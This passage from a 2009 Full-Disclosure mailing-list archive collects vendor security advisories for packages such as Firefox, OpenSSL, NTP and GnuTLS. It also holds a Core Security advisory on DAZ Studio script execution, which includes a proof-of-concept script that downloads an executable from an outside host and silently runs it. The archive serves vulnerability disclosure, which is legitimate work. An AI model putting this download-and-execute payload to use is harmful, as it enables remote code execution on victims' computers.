 54bcf934bbf85cf9317abd3f693c1286  
2008.0/i586/wireshark-tools-1.0.10-0.1mdv2008.0.i586.rpm 
 927ccd36d358084a70554eda33b015df  
2008.0/SRPMS/wireshark-1.0.10-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 4320e20a9c0a61623c859ba20c4030a4  
2008.0/x86_64/dumpcap-1.0.10-0.1mdv2008.0.x86_64.rpm
 4886aa56bd3daf5e906343b92d1c7d57  
2008.0/x86_64/lib64wireshark0-1.0.10-0.1mdv2008.0.x86_64.rpm
 d3d9e1847a4b3ba05a00614e71d76664  
2008.0/x86_64/lib64wireshark-devel-1.0.10-0.1mdv2008.0.x86_64.rpm
 ce78c38b33a2c3c0edde2355845a3218  
2008.0/x86_64/rawshark-1.0.10-0.1mdv2008.0.x86_64.rpm
 41e36f27fa93dfd8ecacae797403412a  
2008.0/x86_64/tshark-1.0.10-0.1mdv2008.0.x86_64.rpm
 9b3829112d7250b78294d0f65c71d85b  
2008.0/x86_64/wireshark-1.0.10-0.1mdv2008.0.x86_64.rpm
 3e6d92fbdae924c7bb131fd867895695  
2008.0/x86_64/wireshark-tools-1.0.10-0.1mdv2008.0.x86_64.rpm 
 927ccd36d358084a70554eda33b015df  
2008.0/SRPMS/wireshark-1.0.10-0.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGAmomqjQ0CJFipgRArBzAJ4owwY4ReC8xR2AHGHILeOpGhziHwCdGwn4
luHzusXu4mtItmvczmZxMTs=
=OOZm
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:290-1 ] firefox

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:290-1
 http://www.mandriva.com/security/
 ___

 Package : firefox
 Date: December 2, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Security issues were identified and fixed in firefox 3.0.x:
 
 Security researcher Alin Rad Pop of Secunia Research reported a
 heap-based buffer overflow in Mozilla's string to floating point
 number conversion routines. Using this vulnerability an attacker
 could craft some malicious JavaScript code containing a very long
 string to be converted to a floating point number which would result
 in improper memory allocation and the execution of an arbitrary memory
 location. This vulnerability could thus be leveraged by the attacker
 to run arbitrary code on a victim's computer (CVE-2009-1563).
 
 Security researcher Jeremy Brown reported that the file naming scheme
 used for downloading a file which already exists in the downloads
 folder is predictable. If an attacker had local access to a victim's
 computer and knew the name of a file the victim intended to open
 through the Download Manager, he could use this vulnerability to
 place a malicious file in the world-writable directory used to save
 temporary downloaded files and cause the browser to choose the
 incorrect file when opening it. Since this attack requires local
 access to the victim's machine, the severity of this vulnerability
 was determined to be low (CVE-2009-3274).
 
 Security researcher Paul Stone reported that a user's form history,
 both from web content as well as the smart location bar, was vulnerable
 to theft. A malicious web page could synthesize events such as mouse
 focus and key presses on behalf of the victim and trick the browser
 into auto-filling the form fields with history entries and then
 reading the entries (CVE-2009-3370).
 
 Security researcher Marco C. reported a flaw in the parsing of regular
 expressions used in Proxy Auto-configuration (PAC) files. In certain
 cases this flaw could be used by an attacker to crash a victim's
 browser and run arbitrary code on their computer. Since this
 vulnerability requires the victim to have PAC configured in their
 environment with specific regular expresssions which can trigger
 the crash, the severity of the issue was determined to be moderate
 (CVE-2009-3372).
 
 Security research firm iDefense reported that researcher regenrecht
 discovered a heap-based buffer overflow in Mozilla's GIF image
 parser. This vulnerability could potentially be used by an attacker
 to crash a victim's browser and run arbitrary code on their computer
 (CVE-2009-3373).
 
 Mozilla security researcher moz_bug_r_a4 reported that the XPCOM
 utility XPCVariant::VariantDataToJS unwrapped doubly-wrapped objects
 before returning them to chrome callers. This could result in chrome
 privileged code calling methods on an object which had previously been
 created or modified by web content, potentially executing malicious
 JavaScript code with chrome privileges (CVE-2009-3374).
 
 Security researcher Gregory Fleischer reported that text within a
 selection on a web page can be read by JavaScript in a different domain
 using the document.getSelection function, violating the same-origin
 policy. Since this vulnerability requires user interaction to exploit,
 its severity was determined to be moderate (CVE-2009-3375).
 
 Mozilla security researchers Jesse Ruderman and Sid Stamm reported
 that when downloading a file containing a right-to-left override
 character (RTL) in the filename, the name displayed in the dialog
 title bar conflicts with the name of the file shown in the dialog
 body. An attacker could use this vulnerability to obfuscate the name
 and file extension of a file to be downloaded and opened, potentially
 causing a user to run an executable file when they expected to open
 a non-executable file (CVE-2009-3376).
 
 Mozilla developers and community members identified and fixed
 several stability bugs in the browser engine used in Firefox and
 other Mozilla-based products. Some of these crashes showed evidence
 of memory corruption under certain circumstances and we presume that
 with enough effort at least some of these could be exploited to run
 arbitrary code. Vladimir Vukicevic, Jesse Ruderman, Martijn Wargers,
 Daniel Banchero, David Keeler, and Boris Zbarsky reported crashes
 in the browser engine which affected both Firefox 3 and Firefox 3.5
 (CVE-2009-3380). Carsten Book reported a crash in the browser engine
 which affected only Firefox 3 (CVE-2009-3382).
 
 This update provides the latest Mozilla Firefox 3.0.x to correct
 these issues.
 
 Additionally, some packages which require so, have been rebuilt and
 are being provided as 

[Full-disclosure] CORE-2009-0911: DAZ Studio Arbitrary Command Execution

2009-12-03 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

DAZ Studio Arbitrary Command Execution



1. *Advisory Information*

Title: DAZ Studio Arbitrary Command Execution
Advisory Id: CORE-2009-0911
Advisory URL:
http://www.coresecurity.com/content/dazstudio-scripting-injection
Date published: 2009-12-02
Date of last update: 2009-12-01
Vendors contacted: DAZ
Release mode: User release



2. *Vulnerability Information*

Class: Insufficient UI Warning of Dangerous Operations [CWE-357]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37176
CVE Name: CVE-2009-4148



3. *Vulnerability Description*

DAZ Studio [2] is a 3D figure illustration/animation application
released by DAZ 3D Inc. DAZ Studio can be accessed via a scripting
language which allows for quite a bit of diversity in tool creation. DAZ
Studio does not ask for any confirmation from the user prior to
executing a scripting file with any of the following extensions: .ds,
.dsa, .dse, .dsb. An attacker could abuse the scripting interface by
enticing an unsuspecting user to open a malicious scripting file, thus
obtaining remote code execution.


4. *Vulnerable packages*

   . DAZ Studio 2.3.3.161
   . DAZ Studio 2.3.3.163
   . DAZ Studio 3.0.1.135
   . Older versions are probably affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*

The vendor did not provide fixes or workaround information.

To prevent the accidental execution of malicious scripting files you can
disable the default file association of the dangerous file extensions in
the Windows Explorer. The following KB article from Microsoft describe
how to deassociate a file extension.
http://support.microsoft.com/kb/307859


6. *Credits*

This vulnerability was discovered and researched by Diego Juarez from
Core Security Technologies during Bugweek 2009 [1].


7. *Technical Description / Proof of Concept Code*

The following Proof of Concept .ds file demonstrates remote code
execution by downloading and executing putty in the context of DAZ Studio.

/-
// DAZ Studio PoC
var oFile = new DzFile("d:\\test.js");
oFile.open(2);
oFile.write("s=WScript.CreateObject(\'WScript.Shell\');o=WScript.CreateObject(\'ADODB.Stream\');e=s.Environment(\'Process\');u=\'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\';b=e.Item(\'TEMP\')+\'agent.exe\';try{x=new
ActiveXObject(\'Microsoft.XMLHTTP\');}catch(e){x=new
ActiveXObject(\'MSXML2.ServerXMLHTTP\');}if(!x)exit(0);x.open(\'GET\',u,0);x.send(null);d=x.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(d);o.SaveToFile(b,2);s.Run(b,0);\r\n");
oFile.close()

var oProcess = new DzProcess(["wscript", "d:\\test.js"]);
oProcess.start();

- -/



8. *Report Timeline*

. 2009-11-06:
Core Security Technologies completes a support form trying to reach a
security contact from DAZ.

. 2009-11-06:
Core receives an email saying that Core contact email was not recognised
as a registered email.

. 2009-11-06:
Core completes a registration form to be able to contact the support team.

. 2009-11-13:
Since DAZ support team didn't respond to any mail, Core contacts CERT
trying to obtain a valid security contact at DAZ.

. 2009-11-16:
CERT acknowledges the comunication, and Core reschedules the advisory to
November 30th, 2009 based on CERT recommendations.

. 2009-11-18:
CERT communicates that the vendor doesn't seem familiar with
vulnerability reporting/disclosure, and request additional information
about the vulnerability.

. 2009-11-18:
CERT contacted DAZ four times between 11/16 and 11/30.

. 2009-11-19:
Core replies that the issue is a script injection vulnerability.

. 2009-11-30:
DAZ did not wish to provide contact information.

. 2009-12-03:
The advisory CORE-2009-0911 is published.



9. *References*

[1] The author participated in Core Bugweek 2009 as member of the team
"Gimbal Lock N Load".
[2] DAZ Studio: http://www.daz3d.com/i/software/daz_studio3?_m=d


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most com

[Full-disclosure] [ MDVSA-2009:310 ] openssl

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:310
 http://www.mandriva.com/security/
 ___

 Package : openssl
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple security vulnerabilities has been identified and fixed
 in OpenSSL:
 
 The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k
 and earlier 0.9.8 versions allows remote attackers to cause a denial
 of service (memory consumption) via a large series of future epoch
 DTLS records that are buffered in a queue, aka DTLS record buffer
 limitation bug. (CVE-2009-1377)
 
 Multiple memory leaks in the dtls1_process_out_of_seq_message function
 in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow
 remote attackers to cause a denial of service (memory consumption)
 via DTLS records that (1) are duplicates or (2) have sequence numbers
 much greater than current sequence numbers, aka DTLS fragment handling
 memory leak. (CVE-2009-1378)
 
 Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment
 function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote
 attackers to cause a denial of service (openssl s_client crash)
 and possibly have unspecified other impact via a DTLS packet, as
 demonstrated by a packet from a server that uses a crafted server
 certificate (CVE-2009-1379).
 
 ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to
 cause a denial of service (NULL pointer dereference and daemon crash)
 via a DTLS ChangeCipherSpec packet that occurs before ClientHello
 (CVE-2009-1386).
 
 The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c
 in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a
 denial of service (NULL pointer dereference and daemon crash) via
 an out-of-sequence DTLS handshake message, related to a fragment
 bug. (CVE-2009-1387)
 
 The NSS library library before 3.12.3, as used in Firefox; GnuTLS
 before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other
 products support MD2 with X.509 certificates, which might allow
 remote attackers to spooof certificates by using MD2 design flaws
 to generate a hash collision in less than brute-force time.  NOTE:
 the scope of this issue is currently limited because the amount of
 computation required is still large (CVE-2009-2409).
 
 A regression was found with the self signed certificate signatures
 checking after applying the fix for CVE-2009-2409. An upstream patch
 has been applied to address this issue.
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 The updated packages have been patched to prevent this.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409
 http://marc.info/?l=openssl-cvs&m=124508133203041&w=2
 https://qa.mandriva.com/54349
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 5e5cebd5417fa8da31e5fb439832f4a9  
2008.0/i586/libopenssl0.9.8-0.9.8e-8.4mdv2008.0.i586.rpm
 56b10d47a9c0522a1d685851301ec3ed  
2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.4mdv2008.0.i586.rpm
 c5689cbe8983c60b21f885bb417fa93d  
2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0.i586.rpm
 f6998620b5cf142898da1b029e055756  
2008.0/i586/openssl-0.9.8e-8.4mdv2008.0.i586.rpm 
 81ed32097a16b03713c16e46e8fae15a  
2008.0/SRPMS/openssl-0.9.8e-8.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 4a8bfb0af6be2dc3b998b34692df9c03  
2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.4mdv2008.0.x86_64.rpm
 a38da1e95cd3883a486cf67312031591  
2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.4mdv2008.0.x86_64.rpm
 82fd48fc11975ae589b7818dce0a9973  
2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0.x86_64.rpm
 a567f0cc7825b1f73e749d96f50a2f2e  
2008.0/x86_64/openssl-0.9.8e-8.4mdv2008.0.x86_64.rpm 
 81ed32097a16b03713c16e46e8fae15a  
2008.0/SRPMS/openssl-0.9.8e-8.4mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for 

[Full-disclosure] [USN-863-1] QEMU vulnerability

2009-12-03 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-863-1  December 03, 2009
qemu-kvm vulnerability
https://launchpad.net/bugs/458521
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  qemu-kvm0.11.0-0ubuntu6.3

After a standard system upgrade you need to restart any QEMU guests to
effect the necessary changes.

Details follow:

It was discovered that QEMU did not properly setup the virtio networking
features available to its guests. A remote attacker could exploit this to
crash QEMU guests which use virtio networking on Linux kernels earlier
than 2.6.26.


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3.diff.gz
  Size/MD5:48984 14fa43af0ed17b918c50803f91b1480d

http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3.dsc
  Size/MD5: 1377 18f25eed2408085a81ad70f39d74a835

http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0.orig.tar.gz
  Size/MD5:  4382897 440837a062967102a68e634d57eaf719

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_amd64.deb
  Size/MD5: 9106 b15b1b8a62f13822a3932abd54a5f924

http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_amd64.deb
  Size/MD5:  2813520 49b26fe83d6c4a5c9befd6716a3431a9

http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_amd64.deb
  Size/MD5:   636074 d9f0b9d5ff621c8b56b9fca53c0ae5d2

http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_amd64.deb
  Size/MD5: 15469258 dd6a9beb5c7d51b43785df232a3a3c40

http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_amd64.deb
  Size/MD5: 8560 2bb181fcf769aafd08d26aa531bb24a4

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_i386.deb
  Size/MD5: 9104 0a0a8a786ad29625fe5aa3de79c5cd98

http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_i386.deb
  Size/MD5:  2592100 3023e22d5e6b3ff51fcf3641cd039e93

http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_i386.deb
  Size/MD5:   558556 5d369da01ec40b1d79b7e015d9982302

http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_i386.deb
  Size/MD5: 13984728 5464f6de725b919cdb4bd7252d221016

http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_i386.deb
  Size/MD5: 8562 3e34c884aff529f95a2975cdb08b2723

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_lpia.deb
  Size/MD5: 9104 156a8ede19f2d65929e73f119415f1b7

http://ports.ubuntu.com/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_lpia.deb
  Size/MD5:  2621316 02b4e9168fdacc9ab8955de557c64a7d

http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_lpia.deb
  Size/MD5:   578522 eb5a953dc2d59c2893656467bc879c25

http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_lpia.deb
  Size/MD5: 14110238 ee2d23ca2c7d25f37e5cb4d315730ad4

http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_lpia.deb
  Size/MD5: 8560 7c2df17d8e67444172c9093c28a01d71




signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2009:309 ] ntp

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:309
 http://www.mandriva.com/security/
 ___

 Package : ntp
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in ntp:
 
 Requesting peer information from a malicious remote time server
 may lead to an unexpected application termination or arbitrary code
 execution (CVE-2009-0159).
 
 A buffer overflow flaw was discovered in the ntpd daemon's NTPv4
 authentication code. If ntpd was configured to use public key
 cryptography for NTP packet authentication, a remote attacker could
 use this flaw to send a specially-crafted request packet that could
 crash ntpd (CVE-2009-1252).
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 The updated packages have been patched to prevent this.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 ce17e1c2cf64b1181b1172f3933fe705  2008.0/i586/ntp-4.2.4-10.2mdv2008.0.i586.rpm
 66baede7d5a42d16d19639148f5e4d52  
2008.0/i586/ntp-client-4.2.4-10.2mdv2008.0.i586.rpm
 f708723a1ab549c987ad64fa2862eb80  
2008.0/i586/ntp-doc-4.2.4-10.2mdv2008.0.i586.rpm 
 fb352aa8910f1bc1319df986769d15ab  2008.0/SRPMS/ntp-4.2.4-10.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 b8519fa3b101a246d35d173745267d6c  
2008.0/x86_64/ntp-4.2.4-10.2mdv2008.0.x86_64.rpm
 dd862d4411bfee35041267817e1e2f0e  
2008.0/x86_64/ntp-client-4.2.4-10.2mdv2008.0.x86_64.rpm
 c38355a0069bc68c50e48726bd5d04e7  
2008.0/x86_64/ntp-doc-4.2.4-10.2mdv2008.0.x86_64.rpm 
 fb352aa8910f1bc1319df986769d15ab  2008.0/SRPMS/ntp-4.2.4-10.2mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF+rdmqjQ0CJFipgRAodXAKC5aT0ePLmbNSalOgR03MecOfci4ACaA4JY
Uc/m/wcRzfz3Nbleml90qVQ=
=ClV1
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:308 ] gnutls

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:308
 http://www.mandriva.com/security/
 ___

 Package : gnutls
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in gnutls:
 
 gnutls-cli in GnuTLS before 2.6.6 does not verify the activation
 and expiration times of X.509 certificates, which allows remote
 attackers to successfully present a certificate that is (1) not yet
 valid or (2) no longer valid, related to lack of time checks in the
 _gnutls_x509_verify_certificate function in lib/x509/verify.c in
 libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup
 (CVE-2009-1417).
 
 A vulnerability have been discovered and corrected in GnuTLS
 before 2.8.2, which could allow man-in-the-middle attackers to spoof
 arbitrary SSL servers via a crafted certificate issued by a legitimate
 Certification Authority (CVE-2009-2730).
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 This update fixes this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1417
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2730
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 b0476297b05fee1e5379a8826905757f  
2008.0/i586/gnutls-2.0.0-2.4mdv2008.0.i586.rpm
 31f117592b8dcb5c3b80b8fde7d2cf2b  
2008.0/i586/libgnutls13-2.0.0-2.4mdv2008.0.i586.rpm
 f9580a96c2b938a67ffc821b4536ce05  
2008.0/i586/libgnutls-devel-2.0.0-2.4mdv2008.0.i586.rpm 
 2d4a130600be226d1ace20f6de574edb  
2008.0/SRPMS/gnutls-2.0.0-2.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 c36eb24563dc027a84aee5f7b4e0e792  
2008.0/x86_64/gnutls-2.0.0-2.4mdv2008.0.x86_64.rpm
 3e58a09629aac586a5f1697063d04421  
2008.0/x86_64/lib64gnutls13-2.0.0-2.4mdv2008.0.x86_64.rpm
 58fbcf88685697a5a2a7959fbd84420d  
2008.0/x86_64/lib64gnutls-devel-2.0.0-2.4mdv2008.0.x86_64.rpm 
 2d4a130600be226d1ace20f6de574edb  
2008.0/SRPMS/gnutls-2.0.0-2.4mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF+Y3mqjQ0CJFipgRAjwhAJ4qfWW60ocYAHhKFR2tnFdvyjUqNQCeO+K2
DJynsXMpzvrD4rEBCyT14Io=
=3onS
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:113-1 ] cyrus-sasl

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:113-1
 http://www.mandriva.com/security/
 ___

 Package : cyrus-sasl
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple buffer overflows in the CMU Cyrus SASL library before 2.1.23
 might allow remote attackers to execute arbitrary code or cause a
 denial of service application crash) via strings that are used as
 input to the sasl_encode64 function in lib/saslutil.c (CVE-2009-0688).
 
 The updated packages have been patched to prevent this.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0688
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 0b5da906226132af2c2ed8270343f557  
2008.0/i586/cyrus-sasl-2.1.22-23.1mdv2008.0.i586.rpm
 de005340f6be93e76feb3d5fe94e2d54  
2008.0/i586/libsasl2-2.1.22-23.1mdv2008.0.i586.rpm
 3d919ce1d732f655ca6be7a89d434acd  
2008.0/i586/libsasl2-devel-2.1.22-23.1mdv2008.0.i586.rpm
 540c3b13f892438d8795c17cc89d42bf  
2008.0/i586/libsasl2-plug-anonymous-2.1.22-23.1mdv2008.0.i586.rpm
 d13e5e77f0949d58097eb2f734a10255  
2008.0/i586/libsasl2-plug-crammd5-2.1.22-23.1mdv2008.0.i586.rpm
 5950850223017fdf5a4b47f0618b55de  
2008.0/i586/libsasl2-plug-digestmd5-2.1.22-23.1mdv2008.0.i586.rpm
 5f1c9ad40cdf003c28ca1be8381d8029  
2008.0/i586/libsasl2-plug-gssapi-2.1.22-23.1mdv2008.0.i586.rpm
 08bbfad70b61a514204344a125413e14  
2008.0/i586/libsasl2-plug-ldapdb-2.1.22-23.1mdv2008.0.i586.rpm
 64386e5dd2a108387dc43379a5513e9c  
2008.0/i586/libsasl2-plug-login-2.1.22-23.1mdv2008.0.i586.rpm
 6447f2431d59bc5b30345259f276f6b3  
2008.0/i586/libsasl2-plug-ntlm-2.1.22-23.1mdv2008.0.i586.rpm
 93ae062a1aaab4e973859ef402a5a242  
2008.0/i586/libsasl2-plug-otp-2.1.22-23.1mdv2008.0.i586.rpm
 91c60f6ec94f4dddc5868588a4b8f68b  
2008.0/i586/libsasl2-plug-plain-2.1.22-23.1mdv2008.0.i586.rpm
 f5a00cdd4639421ca1ee15cc0be63eac  
2008.0/i586/libsasl2-plug-sasldb-2.1.22-23.1mdv2008.0.i586.rpm
 3d497c02f84a1c3328fdb391643da44c  
2008.0/i586/libsasl2-plug-sql-2.1.22-23.1mdv2008.0.i586.rpm 
 6c88dcfd5ab050abd18f4d2983c79300  
2008.0/SRPMS/cyrus-sasl-2.1.22-23.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 80d99cc844c67a2a06759bc1e7cc88db  
2008.0/x86_64/cyrus-sasl-2.1.22-23.1mdv2008.0.x86_64.rpm
 41b95422b894401eecc2a8681c9dc196  
2008.0/x86_64/lib64sasl2-2.1.22-23.1mdv2008.0.x86_64.rpm
 50f33da97b5da9b4bc30ec5bc6d1d659  
2008.0/x86_64/lib64sasl2-devel-2.1.22-23.1mdv2008.0.x86_64.rpm
 d4fb022df681b367b8679136f72b592e  
2008.0/x86_64/lib64sasl2-plug-anonymous-2.1.22-23.1mdv2008.0.x86_64.rpm
 5d927f67880f4aa762fb367d77641721  
2008.0/x86_64/lib64sasl2-plug-crammd5-2.1.22-23.1mdv2008.0.x86_64.rpm
 aed157358368d9ff50959a74fe9c25e4  
2008.0/x86_64/lib64sasl2-plug-digestmd5-2.1.22-23.1mdv2008.0.x86_64.rpm
 84d23ab14f7382f7c7ea6b5967ef2f40  
2008.0/x86_64/lib64sasl2-plug-gssapi-2.1.22-23.1mdv2008.0.x86_64.rpm
 9e4e676d2fbd739510acc32c0c43be95  
2008.0/x86_64/lib64sasl2-plug-ldapdb-2.1.22-23.1mdv2008.0.x86_64.rpm
 4db9412d9b049a07c6cd4a79763d6753  
2008.0/x86_64/lib64sasl2-plug-login-2.1.22-23.1mdv2008.0.x86_64.rpm
